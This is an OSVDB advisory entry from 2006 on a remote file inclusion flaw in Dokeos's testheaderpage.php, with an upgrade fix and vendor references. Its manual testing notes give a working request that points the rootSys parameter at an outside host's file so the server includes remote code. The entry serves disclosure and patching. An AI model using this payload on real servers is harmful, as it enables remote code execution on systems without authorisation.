Dokeos testheaderpage.php rootSys Remote File Inclusion

2006-04-05T06:02:41
ID OSVDB:24508
Type osvdb
Reporter OSVDB
Modified 2006-04-05T06:02:41

Description

Solution Description

Upgrade to version 1.6.4, 2.0.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

claroline/exercice/testheaderpage.php?rootSys=http://www.mptechno.cz/cse.gif?&c

References:

Vendor Specific News/Changelog Entry: http://www.dokeos.com/forum/viewtopic.php?p=27903#27903
Vendor Specific News/Changelog Entry: http://www.dokeos.com/forum/viewtopic.php?t=6848
Vendor Specific News/Changelog Entry: http://www.dokeos.com/wiki/index.php/Dokeos_1.6.4_release_notes_and_changelog
Secunia Advisory ID: 19576